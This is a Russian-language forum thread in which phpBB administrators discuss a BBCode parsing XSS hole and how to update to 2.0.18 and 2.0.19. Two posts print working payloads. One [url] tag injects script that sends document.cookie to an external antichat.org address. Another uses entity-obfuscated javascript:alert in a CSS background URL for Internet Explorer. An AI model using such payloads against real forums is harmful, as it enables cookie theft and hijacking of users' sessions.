Взломали 2.0.18

[avm]

crash, некорректно этот косяк называть только косяком IE. вообще-то это косяк был возможен благодаря некорректному парсингу bbcode.

bas этот косяк залатан давным давно...
[url]http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]тест[/url]

[bas]

crash
Вообще то, владельцам форумов от этого не легче!:-) И в данном случае - это дырка форума. Надеюсь, что в 2.0.18 её нет! Хотя и в ней скоро что нибудь "найдут".
Мне припоминается, что приходили письма, с вложенными архивами. Они были возвращаемые ( адрес не найден), но я то их не писал. В них была "абрака-дабра" и я их удалял...Видимо это были ошибочные попытки взлома.

Добавлено спустя 13 минут 42 секунды:

этот косяк залатан давным давно...

Да я вроде обновлял, но сказали, что обновил только базы...Объясните нерадивому, как правильно обновлять?

[Shadow]

bas
http://www.phpbbguru.net/community/topic5361.html
http://phpbbguru.net/mods/?id=116#116 Скачать: phpbb_2.0.17_to_2.0.18.zip

[bas]

Shadow, спасибо. Я уже поставил ПОЛНУЮ версию 2.0.18

[Gosudar]

Залатан да не совсем. Вот код алерта:

Код: Выделить всё

[url]http://www.[url=http://bla-bla.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]bla-bla[/url][/url]

Если немного подредактировать, то в ослике Ие работает.
Надо с этим что-то делать, млин.

[avm]

Залатан да не совсем. Надо с этим что-то делать

Совсем залатан. Давно уже.
http://phpbbguru.net/community/post33647.html#33647

[Gosudar]

2.0.19 - здесь официально эту дыру залатали.
avm твой тоже работает, респект, я про него просто забыл, думал что 0.18 всё пофиксили, но это сделали только в 2.0.19